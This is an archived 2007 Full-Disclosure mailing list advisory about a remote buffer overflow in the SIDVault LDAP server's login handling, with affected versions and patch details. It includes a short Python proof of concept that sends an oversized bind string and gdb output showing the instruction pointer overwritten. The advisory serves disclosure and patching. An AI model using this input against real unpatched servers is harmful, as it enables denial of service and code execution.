Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] SIDVault LDAP Server Remote Buffer Overflow

from [Joxean Koret] Network Security [Permanent Link]
Subject: [Full-disclosure] SIDVault LDAP Server Remote Buffer Overflow
Date: Sun, 26 Aug 2007 02:50:11 +0200 
SIDVault LDAP Server Remote Buffer Overflow
===========================================

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

        Win32 2.0e
        Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition. 

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es

Attachment: exploit.py
Description: Text Data

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] rPSA-2007-0172-1 tar, rPath Update Announcements
Next by Date:  [Full-disclosure] [SECURITY] [DSA 1358-1] New asterisk packages fix several vulnerabilities, Moritz Muehlenhoff
Previous by Thread:  [Full-disclosure] rPSA-2007-0172-1 tar, rPath Update Announcements
Next by Thread:  EnterpriseDB Advanced Server 8.2 Unitialized Pointer, Joxean Koret
Indexes:  [Date] [Thread] [Top] [All Lists]